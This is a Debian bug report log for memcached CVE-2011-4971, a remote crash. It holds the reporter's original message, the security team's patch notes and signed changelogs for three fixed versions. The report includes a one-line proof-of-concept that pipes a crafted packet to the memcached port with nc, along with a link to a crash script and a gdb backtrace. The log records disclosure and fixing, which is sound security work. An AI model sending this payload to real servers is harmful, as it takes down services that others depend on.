Debian Bug report logs - #706426
memcached: CVE-2011-4971: remote denial of service

version graph

Package: memcached; Maintainer for memcached is David Martínez Moreno <ender@debian.org>; Source for memcached is src:memcached.

Reported by: Henri Salo <henri@nerv.fi>

Date: Tue, 30 Apr 2013 06:30:02 UTC

Severity: important

Tags: fixed-upstream, patch, security, upstream

Found in versions memcached/1.4.13-0.2, memcached/1.4.5-1

Fixed in versions memcached/1.4.13-0.2+deb7u1, memcached/1.4.5-1+deb6u1, memcached/1.4.13-0.3

Done: Salvatore Bonaccorso <carnil@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://code.google.com/p/memcached/issues/detail?id=192

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, David Martínez Moreno <ender@debian.org>:
Bug#706426; Package memcached. (Tue, 30 Apr 2013 06:30:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Henri Salo <henri@nerv.fi>:
New Bug report received and forwarded. Copy sent to David Martínez Moreno <ender@debian.org>. (Tue, 30 Apr 2013 06:30:07 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Henri Salo <henri@nerv.fi>
To: submit@bugs.debian.org
Cc: stefan.bucur@gmail.com
Subject: memcached: CVE-2011-4971: remote denial of service
Date: Tue, 30 Apr 2013 09:27:07 +0300
[Message part 1 (text/plain, inline)]
Package: memcached
Version: 1.4.5-1
Severity: important
Tags: security

memcached service crashes when sending specially crafted packet as reported in
here https://code.google.com/p/memcached/issues/detail?id=i192 Mar 15, 2011.
Upstream has not fixed this yet.

PoC:

1) echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211 
2) http://insecurety.net/wordpress/wp-content/uploads/2013/04/killthebox.py_.txt

Backtrace from squeeze libmemcached5 0.40-1 memcached 1.4.5-1 below:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff69f0700 (LWP 16957)]
0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940)
    at wordcopy.c:392
392 wordcopy.c: No such file or directory.
    in wordcopy.c
(gdb) bt
#0  0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864, srcp=6501120, len=2305843009213693940)
    at wordcopy.c:392
#1  0x00007ffff76c568a in *__GI_memmove (dest=0x7ffff7e58053, src=<value optimized out>, len=18446744073709551581)
    at memmove.c:99
#2  0x000000000040a105 in ?? ()
#3  0x00007ffff7bcc344 in event_base_loop () from /usr/lib/libevent-1.4.so.2
#4  0x000000000040d7c4 in ?? ()
#5  0x00007ffff79af8ca in start_thread (arg=<value optimized out>) at pthread_create.c:300
#6  0x00007ffff7716b6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#7  0x0000000000000000 in ?? ()

Please contact me in case you need help solving this issue.

---
Henri Salo
[signature.asc (application/pgp-signature, inline)]

Marked as found in versions memcached/1.4.13-0.2. Request was from Henri Salo <henri@nerv.fi> to control@bugs.debian.org. (Tue, 30 Apr 2013 06:39:04 GMT) Full text and rfc822 format available.

Set Bug forwarded-to-address to 'https://code.google.com/p/memcached/issues/detail?id=192'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 25 Nov 2013 07:00:05 GMT) Full text and rfc822 format available.

Added tag(s) upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 25 Nov 2013 07:06:04 GMT) Full text and rfc822 format available.

Added tag(s) fixed-upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 29 Dec 2013 16:21:19 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, David Martínez Moreno <ender@debian.org>:
Bug#706426; Package memcached. (Sun, 29 Dec 2013 21:27:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to David Martínez Moreno <ender@debian.org>. (Sun, 29 Dec 2013 21:27:03 GMT) Full text and rfc822 format available.

Message #18 received at 706426@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 706426-submitter@bugs.debian.org, 706426@bugs.debian.org
Subject: Re: Bug#706426: memcached: CVE-2011-4971: remote denial of service
Date: Sun, 29 Dec 2013 22:23:44 +0100
[Message part 1 (text/plain, inline)]
Control: tags -1 + patch

Attached is proposed debdiff with upstream commit. The upload might be
also a chance to fix the orig.tar.gz/native package issue.

Regards,
Salvatore
[memcached_1.4.13-0.3.debdiff (text/plain, attachment)]

Added tag(s) patch. Request was from Salvatore Bonaccorso <carnil@debian.org> to 706426-submit@bugs.debian.org. (Sun, 29 Dec 2013 21:27:04 GMT) Full text and rfc822 format available.

Message sent on to Henri Salo <henri@nerv.fi>:
Bug#706426. (Sun, 29 Dec 2013 21:27:12 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, David Martínez Moreno <ender@debian.org>:
Bug#706426; Package memcached. (Mon, 30 Dec 2013 17:03:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to David Martínez Moreno <ender@debian.org>. (Mon, 30 Dec 2013 17:03:09 GMT) Full text and rfc822 format available.

Message #28 received at 706426@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 733643@bugs.debian.org, 706426@bugs.debian.org
Subject: memcached: diff for NMU version 1.4.13-0.3
Date: Mon, 30 Dec 2013 18:00:38 +0100
[Message part 1 (text/plain, inline)]
Hi

Attached is a preliminary debdiff for fixing both issues.

Regards,
Salvatore
[memcached-1.4.13-0.3-nmu.diff (text/x-diff, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, David Martínez Moreno <ender@debian.org>:
Bug#706426; Package memcached. (Wed, 01 Jan 2014 14:42:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to David Martínez Moreno <ender@debian.org>. (Wed, 01 Jan 2014 14:42:04 GMT) Full text and rfc822 format available.

Message #33 received at 706426@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 706426@bugs.debian.org, 733643@bugs.debian.org
Subject: memcached: diff for NMU version 1.4.13-0.3
Date: Wed, 1 Jan 2014 15:39:34 +0100
[Message part 1 (text/plain, inline)]
Control: tags 706426 + patch pending
Control: tags 733643 + patch pending

Dear maintainer,

I've prepared an NMU for memcached (versioned as 1.4.13-0.3) and
uploaded it to DELAYED/2. Please feel free to tell me if I
should delay it longer.

Regards,
Salvatore
[memcached-1.4.13-0.3-nmu.diff (text/x-diff, attachment)]
[signature.asc (application/pgp-signature, inline)]

Added tag(s) pending. Request was from Salvatore Bonaccorso <carnil@debian.org> to 706426-submit@bugs.debian.org. (Wed, 01 Jan 2014 14:42:04 GMT) Full text and rfc822 format available.

Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Wed, 01 Jan 2014 21:48:21 GMT) Full text and rfc822 format available.

Notification sent to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer. (Wed, 01 Jan 2014 21:48:21 GMT) Full text and rfc822 format available.

Message #40 received at 706426-close@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 706426-close@bugs.debian.org
Subject: Bug#706426: fixed in memcached 1.4.13-0.2+deb7u1
Date: Wed, 01 Jan 2014 21:47:14 +0000
Source: memcached
Source-Version: 1.4.13-0.2+deb7u1

We believe that the bug you reported is fixed in the latest version of
memcached, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 706426@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated memcached package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 30 Dec 2013 17:47:44 +0100
Source: memcached
Binary: memcached
Architecture: source amd64
Version: 1.4.13-0.2+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: David Martínez Moreno <ender@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Description: 
 memcached  - A high-performance memory object caching system
Closes: 706426 733643
Changes: 
 memcached (1.4.13-0.2+deb7u1) wheezy-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add 06_CVE-2011-4971.patch patch.
     CVE-2011-4971: Fix remote denial of service. Sending a specially
     crafted packet cause memcached to segfault. (Closes: #706426)
   * Add 07_CVE-2013-7239.patch patch.
     CVE-2013-7239: SASL authentication allows wrong credentials to access
     memcache. (Closes: #733643)
Checksums-Sha1: 
 644a6d5069a743764e43e5fbecd48ef7a67ff478 1806 memcached_1.4.13-0.2+deb7u1.dsc
 d9a48d222de53a2603fbab6156d48d0e8936ee92 320751 memcached_1.4.13.orig.tar.gz
 08a85a892d0fb0f45e3f35180829582af2c36de3 13967 memcached_1.4.13-0.2+deb7u1.diff.gz
 3d13843a773754c684d84e6754f382362b76322d 87758 memcached_1.4.13-0.2+deb7u1_amd64.deb
Checksums-Sha256: 
 1af5edec8ebf93af2a28a6df484f42e41a3973a90d3689f71cc092ef2d73c1b1 1806 memcached_1.4.13-0.2+deb7u1.dsc
 cb0b8b87aa57890d2327906a11f2f1b61b8d870c0885b54c61ca46f954f27e29 320751 memcached_1.4.13.orig.tar.gz
 e987f888ba1745cdf6ce604197234cffcaabec338790dabeed1c4a2bc3395e41 13967 memcached_1.4.13-0.2+deb7u1.diff.gz
 99a2572e72f8708453ac949c11ee74278dafc7a9ed04a3db3dce583c698b8ad1 87758 memcached_1.4.13-0.2+deb7u1_amd64.deb
Files: 
 11e442648b3ca4d3b7108e9e26677288 1806 web optional memcached_1.4.13-0.2+deb7u1.dsc
 6d18c6d25da945442fcc1187b3b63b7f 320751 web optional memcached_1.4.13.orig.tar.gz
 177d6c2ea9e0dc555c0b18d49b4f3b6d 13967 web optional memcached_1.4.13-0.2+deb7u1.diff.gz
 ec7acfae73fa674b473b37ed45f9a8b1 87758 web optional memcached_1.4.13-0.2+deb7u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBCgAGBQJSwgiZAAoJEAVMuPMTQ89EB6kP/jFw6pADqy/JCWlcc9Uw0C2t
2Slfmwl6KeazFn0xka+gOYda9sq4cpL12ysaystysjVzsrvDYxmRU5WNYj+YydUO
EKZlZIpOTAb4fqU4ktju/ee/5+zMhxFt34pgrrkYGIMOuc+b8X/g/EUYdUfidXx4
afK4966TQDxULbnCEy+6j1jD2PGyn4nv+GEdbc7g3Pj+P/zk5u1/3r4IdS6+XRP9
rLKzSLHxEl6BVEAY2BLC/N8XLBEmjOZaz5CjyjjEsDnRYqlrXycCivfQeuFYdlqk
CS4oLJbjS32W8dL0sQluLd9+P3rT29CPc20gKdK7iEsbzUiXFUhzM1iArfaLSBjc
cLmLhXLhbhci9EC+3jNybIA0c3Yyrd3LdfKF5qSWno2Wwf9IXVSURUl1y7OmwMmX
c8jtcw1qI9Kq7ETHbJP2mcNtlWK0ARSC0WytAHTAl5AmWvJGbwTV1v4cJDeA0DT0
bUrB7vG38kNX94mwLO7zz3X4A08NYUlNq1HgL6GOZoIRXFeWbRCa1GG9GSxxNXkY
NDiqomqyd7Cw1BuQtRoE79ZGm3/oZ9kuOtePKSazV0DhCZYFdUG+G/GJmZ6RgoX4
raKOJbm7yMseOaMLRODHgR5YhpW70MHSna98k3QpZco3nw/8sQeM2lklWC047ZcI
rYgylah/DqrJDiBCm/yt
=4Jji
-----END PGP SIGNATURE-----




Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Thu, 02 Jan 2014 13:51:13 GMT) Full text and rfc822 format available.

Notification sent to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer. (Thu, 02 Jan 2014 13:51:14 GMT) Full text and rfc822 format available.

Message #45 received at 706426-close@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 706426-close@bugs.debian.org
Subject: Bug#706426: fixed in memcached 1.4.5-1+deb6u1
Date: Thu, 02 Jan 2014 13:47:31 +0000
Source: memcached
Source-Version: 1.4.5-1+deb6u1

We believe that the bug you reported is fixed in the latest version of
memcached, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 706426@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated memcached package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 31 Dec 2013 08:25:46 +0100
Source: memcached
Binary: memcached
Architecture: source amd64
Version: 1.4.5-1+deb6u1
Distribution: squeeze-security
Urgency: high
Maintainer: David Martínez Moreno <ender@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Description: 
 memcached  - A high-performance memory object caching system
Closes: 698231 706426
Changes: 
 memcached (1.4.5-1+deb6u1) squeeze-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add 03_fix-buffer-overrun_when_logging_keys.patch patch.
     CVE-2013-0179: DoS due to buffer overrun when printing out keys to be
     deleted in verbose mode. (Closes: #698231)
   * Add 04_CVE-2011-4971.patch.
     CVE-2011-4971: Fix remote denial of service. Sending a specially crafted
     packet cause memcached to segfault. (Closes: #706426)
Checksums-Sha1: 
 b89af44ed7177f382fba9d751e8aef3c126f0f87 1712 memcached_1.4.5-1+deb6u1.dsc
 c7d6517764b82d23ae2de76b56c2494343c53f02 302516 memcached_1.4.5.orig.tar.gz
 3c930d2b7a66b065ada9eb1c46c94c55f5090fde 10965 memcached_1.4.5-1+deb6u1.diff.gz
 5eb9a5843333495a5c39fb6fb594a156d009cad9 76622 memcached_1.4.5-1+deb6u1_amd64.deb
Checksums-Sha256: 
 eff2417dde202b92c51d3f665c3bea6aa6441f7d1d19cc517e6ab250dbc13a3c 1712 memcached_1.4.5-1+deb6u1.dsc
 9571b4b85484e46b3b10f07ccba77a1fa97d60660b32859f990effefb3005f91 302516 memcached_1.4.5.orig.tar.gz
 05eff830d3f99d76feb247a2267197d71aa6a6e0b98383b1abf258592cf9b6d4 10965 memcached_1.4.5-1+deb6u1.diff.gz
 8de46a28eea780382f1614060406cfe70c3c5d67462bdffd2066858b2528ac57 76622 memcached_1.4.5-1+deb6u1_amd64.deb
Files: 
 4b062f67fa9868b325e3683136ff22ab 1712 web optional memcached_1.4.5-1+deb6u1.dsc
 583441a25f937360624024f2881e5ea8 302516 web optional memcached_1.4.5.orig.tar.gz
 e9f22698a2d8950f3c8899d36ca4c025 10965 web optional memcached_1.4.5-1+deb6u1.diff.gz
 0d466a9ee77d037abb5d8aef2a4e66ff 76622 web optional memcached_1.4.5-1+deb6u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBCgAGBQJSw8vBAAoJEAVMuPMTQ89EjZ8P/iXwKr1qpAuFEfijhmY5wpqH
Jp4BWADkD1jS5zn9ixGGvmB+/oC3fJv0oTrEQZiSV2szhtl81sULkcW3NoL9fVBT
KQFkmKLFDbQlSEd/JMu+4gYoHWjznHzDtS7YEcxBUwYYRcss/K8Jw6KoAbPbPKkp
DN1OHEoZanT7NwAbs7gr0iqFGKbGEBBXF6hDj7xNS+6XwU6a+cWTtB9Ws9uBS0VW
E9KTyz1V3sSUX5oN/Lwwo2NUnIemWonNQCzbO1XXhc2H3EXFYz06wPYuscXokPyb
STnl0A6RmSs+QPkE0gAf60mDFwfa8z+4zWd4RdNn4iucp8cbfQ9c9uQ2PB2LT+I0
Ytp47LcNi9pLShJf9N/g8M8kwChewXy3pClMhBg+WLz/uHW/ahKcbY1HEl3MbIZB
X55DTXrgk5MIxVpeQSVfcWXgAylSD1jf3N8zjnzxznyUz6l0oSISoEGtPADV7MZM
9mGEnws3qcfSfSa/fQlamrZ8TtyIpaFjvYS1urNQxKIoG6EH8mC1k5m9IBk+vT/j
/2Ky9Y1GxKHIxXK8AYVYqZGu+fbritWECdfYQcOsifEUwKaMzspurgjKON8E2PMa
XK2ebxuXLTlnBE+NzBJkW8leZeJOx+vO7MFCgiCW9BWVP6hXmMFWGSyrRzHAeks2
ZPtQjDi5iPu357mKuqzk
=Qrke
-----END PGP SIGNATURE-----




Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Fri, 03 Jan 2014 15:24:05 GMT) Full text and rfc822 format available.

Notification sent to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer. (Fri, 03 Jan 2014 15:24:05 GMT) Full text and rfc822 format available.

Message #50 received at 706426-close@bugs.debian.org (full text, mbox):

From: Salvatore Bonaccorso <carnil@debian.org>
To: 706426-close@bugs.debian.org
Subject: Bug#706426: fixed in memcached 1.4.13-0.3
Date: Fri, 03 Jan 2014 15:22:20 +0000
Source: memcached
Source-Version: 1.4.13-0.3

We believe that the bug you reported is fixed in the latest version of
memcached, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 706426@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated memcached package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 30 Dec 2013 17:47:44 +0100
Source: memcached
Binary: memcached
Architecture: source amd64
Version: 1.4.13-0.3
Distribution: unstable
Urgency: high
Maintainer: David Martínez Moreno <ender@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Description: 
 memcached  - A high-performance memory object caching system
Closes: 706426 733643
Changes: 
 memcached (1.4.13-0.3) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Add 06_CVE-2011-4971.patch patch.
     CVE-2011-4971: Fix remote denial of service. Sending a specially
     crafted packet cause memcached to segfault. (Closes: #706426)
   * Add 07_CVE-2013-7239.patch patch.
     CVE-2013-7239: SASL authentication allows wrong credentials to access
     memcache. (Closes: #733643)
Checksums-Sha1: 
 1a470c770a3766e7abe35cbc4fda1184439f4a82 1778 memcached_1.4.13-0.3.dsc
 d9a48d222de53a2603fbab6156d48d0e8936ee92 320751 memcached_1.4.13.orig.tar.gz
 e810be36f9f75c5cf477d726ddfe8ad87eacf183 13906 memcached_1.4.13-0.3.diff.gz
 bdbc24572e201711871992c5d8783faf0b669e7d 77622 memcached_1.4.13-0.3_amd64.deb
Checksums-Sha256: 
 87c81faccf611b7e39e7464ed217ed1e6a3ce36631ede820b63b765a549ad2c3 1778 memcached_1.4.13-0.3.dsc
 cb0b8b87aa57890d2327906a11f2f1b61b8d870c0885b54c61ca46f954f27e29 320751 memcached_1.4.13.orig.tar.gz
 45760a8dfffc672aad948aace33b87c2ebe7a2934d5f0d096458be99ac62c970 13906 memcached_1.4.13-0.3.diff.gz
 dc82c7c203677a2009dcbab978a42fee9c0548f3a3f36a08d5c8465c3c96fbde 77622 memcached_1.4.13-0.3_amd64.deb
Files: 
 a8e1422ac7dc84748fd216f348314a72 1778 web optional memcached_1.4.13-0.3.dsc
 6d18c6d25da945442fcc1187b3b63b7f 320751 web optional memcached_1.4.13.orig.tar.gz
 6c1f14b699cc5e962781b61da3773067 13906 web optional memcached_1.4.13-0.3.diff.gz
 6bcc195d2eff12e2c3f82cfdd6c01c71 77622 web optional memcached_1.4.13-0.3_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBCgAGBQJSxCeyAAoJEAVMuPMTQ89E1RwP/1xAt2C9bBWCtIo2wS/Vkt3g
c67K3yVS+oFiAUj068Z0/rWfvnZcfAR8mG9Mu8eBD5AMrJES9XLBU1ZWOHKTmaqr
CLFVOhbn8AS5CadkJ5VpCV56ISbXrVlsxRgmfzKhIObOseNFC/Alt2c7GC7fM7Bj
57mcEof41LHNso19g3by/WV4vI33CGCZ2NGobF+VzBw0lKu3mVDbayEQ2HR2MAnw
8P3yVqkmMJ43UNqn6dBAru/IVsb3zfW/GNF1XS8bGwzTRVSj4/nzYHvyUuLjL0A6
Db2Bc5SBwPbQIX3CalAKCCX85DwgvV1LQZDuD+cbwWLSlHH+wWPTqhPU+y2Q26BO
Pjf1kJ/+ZIls5Pt2zX4d2Y5ufgoAxbdCQjuhDt91LQYMLM4Oy3YMId7GkCzEgxTi
lfHeF2/walrig2U4DrJwQmvoASM6ng9PZH4G9aI5lS7ZuSJ4DL3972WVauDg326k
CYYGY8W0t+54qLYvtjH4Dh3vV4rKXYEFQglqOvbxjCWisLKtWNHQPPTjUevLCNcS
NigGKJCM45KlZ4bndkNJk6UXQDX5hYcFhEYvChgxN1eE6bYWUIgw2HBMz+3p1ETD
pYxw6c/MpHF40L6hdUfK6ERyJnCa91XhyyBZtIrrWjSncG4q+KTJujNo5pLxAd2z
X8ie2PQA25PCsPpnonuY
=hiUH
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 03 Feb 2014 07:30:09 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 23 11:16:06 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.